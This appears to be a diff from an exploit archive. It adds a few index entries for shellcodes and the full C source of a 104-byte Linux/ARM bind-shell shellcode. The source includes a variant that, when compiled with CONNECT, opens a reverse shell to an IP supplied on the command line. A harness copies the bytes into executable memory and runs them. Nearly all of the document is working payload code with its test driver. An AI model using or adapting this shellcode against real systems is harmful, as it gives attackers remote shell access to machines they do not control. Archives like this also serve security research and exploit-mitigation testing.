894 44856 shellcodes/arm/44856.c Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes) 2018-06-08 rtmcx shellcode arm
895 44963 shellcodes/linux_x86/44963.c Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes) 2018-07-02 Anurag Srivastava shellcode linux_x86
896 44990 shellcodes/linux_x86/44990.c Linux/x86 - Kill Process Shellcode (20 bytes) 2018-07-09 Nathu Nandwani shellcode linux_x86
897 45029 shellcodes/arm/45029.c Linux/ARM - Bind (1234/TCP) Shell (/bin/sh) Shellcode (104 bytes) 2018-07-16 odzhancode shellcode arm

179
shellcodes/arm/45029.c Normal file
View file

@ -0,0 +1,179 @@
/**
Copyright © 2017 Odzhan. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#ifndef CONNECT
// bind shell
#define CODE_SIZE 104
char CODE[] = {
/* 0000 */ "\x54\x40\x9f\xe5" /* ldr r4, [pc, #0x54] */
/* 0004 */ "\x54\x50\x9f\xe5" /* ldr r5, [pc, #0x54] */
/* 0008 */ "\x54\x60\x9f\xe5" /* ldr r6, [pc, #0x54] */
/* 000C */ "\x01\x30\x8f\xe2" /* add r3, pc, #1 */
/* 0010 */ "\x13\xff\x2f\xe1" /* bx r3 */
/* 0014 */ "\x52\x40" /* eors r2, r2 */
/* 0016 */ "\x01\x21" /* movs r1, #1 */
/* 0018 */ "\x0f\x02" /* lsls r7, r1, #8 */
/* 001A */ "\x19\x37" /* adds r7, #0x19 */
/* 001C */ "\x02\x20" /* movs r0, #2 */
/* 001E */ "\x01\xdf" /* svc #1 */
/* 0020 */ "\x80\x46" /* mov r8, r0 */
/* 0022 */ "\x21\x1c" /* adds r1, r4, #0 */
/* 0024 */ "\x06\xb4" /* push {r1, r2} */
/* 0026 */ "\x69\x46" /* mov r1, sp */
/* 0028 */ "\x4a\x70" /* strb r2, [r1, #1] */
/* 002A */ "\x10\x22" /* movs r2, #0x10 */
/* 002C */ "\x01\x37" /* adds r7, #1 */
/* 002E */ "\x01\xdf" /* svc #1 */
/* 0030 */ "\x01\x21" /* movs r1, #1 */
/* 0032 */ "\x40\x46" /* mov r0, r8 */
/* 0034 */ "\x02\x37" /* adds r7, #2 */
/* 0036 */ "\x01\xdf" /* svc #1 */
/* 0038 */ "\x52\x40" /* eors r2, r2 */
/* 003A */ "\x49\x40" /* eors r1, r1 */
/* 003C */ "\x40\x46" /* mov r0, r8 */
/* 003E */ "\x01\x37" /* adds r7, #1 */
/* 0040 */ "\x01\xdf" /* svc #1 */
/* 0042 */ "\x80\x46" /* mov r8, r0 */
/* 0044 */ "\x03\x21" /* movs r1, #3 */
/* 0046 */ "\x3f\x27" /* movs r7, #0x3f */
/* 0048 */ "\x40\x46" /* mov r0, r8 */
/* 004A */ "\x01\x39" /* subs r1, #1 */
/* 004C */ "\x01\xdf" /* svc #1 */
/* 004E */ "\xfa\xd1" /* bne #0x46 */
/* 0050 */ "\x17\x1c" /* adds r7, r2, #0 */
/* 0052 */ "\xe0\xb4" /* push {r5, r6, r7} */
/* 0054 */ "\x68\x46" /* mov r0, sp */
/* 0056 */ "\x0b\x27" /* movs r7, #0xb */
/* 0058 */ "\x01\xdf" /* svc #1 */
/* 005A */ "\xc0\x46" /* mov r8, r8 */
/* 005C */ "\x02\xff\x04\xd2" /* AF_INET, 1234 */
/* 0060 */ "\x2f\x62\x69\x6e" /* /bin */
/* 0064 */ "\x2f\x2f\x73\x68" /* //sh */
};
#else
char CODE[] = {
/* 0000 */ "\x44\x30\x9f\xe5" /* ldr r3, [pc, #0x44] */
/* 0004 */ "\x44\x40\x9f\xe5" /* ldr r4, [pc, #0x44] */
/* 0008 */ "\x44\x50\x9f\xe5" /* ldr r5, [pc, #0x44] */
/* 000C */ "\x44\x60\x9f\xe5" /* ldr r6, [pc, #0x44] */
/* 0010 */ "\x01\x00\x8f\xe2" /* add r0, pc, #1 */
/* 0014 */ "\x10\xff\x2f\xe1" /* bx r0 */
/* 0018 */ "\x52\x40" /* eors r2, r2 */
/* 001A */ "\x01\x21" /* movs r1, #1 */
/* 001C */ "\x02\x20" /* movs r0, #2 */
/* 001E */ "\x0f\x02" /* lsls r7, r1, #8 */
/* 0020 */ "\x19\x37" /* adds r7, #0x19 */
/* 0022 */ "\x01\xdf" /* svc #1 */
/* 0024 */ "\x80\x46" /* mov r8, r0 */
/* 0026 */ "\x18\xb4" /* push {r3, r4} */
/* 0028 */ "\x69\x46" /* mov r1, sp */
/* 002A */ "\x4a\x70" /* strb r2, [r1, #1] */
/* 002C */ "\x10\x22" /* movs r2, #0x10 */
/* 002E */ "\x02\x37" /* adds r7, #2 */
/* 0030 */ "\x01\xdf" /* svc #1 */
/* 0032 */ "\x03\x21" /* movs r1, #3 */
/* 0034 */ "\x3f\x27" /* movs r7, #0x3f */
/* 0036 */ "\x40\x46" /* mov r0, r8 */
/* 0038 */ "\x01\x39" /* subs r1, #1 */
/* 003A */ "\x01\xdf" /* svc #1 */
/* 003C */ "\xfa\xd1" /* bne #0x34 */
/* 003E */ "\x52\x40" /* eors r2, r2 */
/* 0040 */ "\x17\x1c" /* adds r7, r2, #0 */
/* 0042 */ "\xe0\xb4" /* push {r5, r6, r7} */
/* 0044 */ "\x68\x46" /* mov r0, sp */
/* 0046 */ "\x0b\x27" /* movs r7, #0xb */
/* 0048 */ "\x01\xdf" /* svc #1 */
/* 004A */ "\xc0\x46" /* mov r8, r8 */
/* 004C */ "\x02\xff\x04\xd2" /* AF_INET, 1234 */
/* 0050 */ "\x7f\x00\x00\x01" /* 127.0.0.1 */
/* 0054 */ "\x2f\x62\x69\x6e" /* /bin */
/* 0058 */ "\x2f\x2f\x73\x68" /* //sh */
};
#define IP_ADDR_OFS 0x50
#endif
// allocate read/write and executable memory
// copy data from code and execute
void exec_code(void *code, size_t code_len, char *ip_str) {
void *bin;
uint8_t *p;
in_addr_t ip;
#ifdef CONNECT
ip=inet_addr(ip_str);
#endif
bin=mmap (0, code_len,
PROT_EXEC | PROT_WRITE | PROT_READ,
MAP_ANON | MAP_PRIVATE, -1, 0);
if (bin!=NULL) {
p=(uint8_t*)bin;
memcpy (p, code, code_len);
#ifdef CONNECT
// copy ip
memcpy ((void*)&p[IP_ADDR_OFS], (void*)&ip, sizeof(ip));
#endif
// execute
((void(*)())bin)();
munmap (bin, code_len);
}
}
int main(int argc, char *argv[]) {
#ifdef CONNECT
if(argc!=2){
printf("usage: test <ip address>\n");
return 0;
}
#endif
exec_code(CODE, CODE_SIZE,argv[1]);
return 0;
}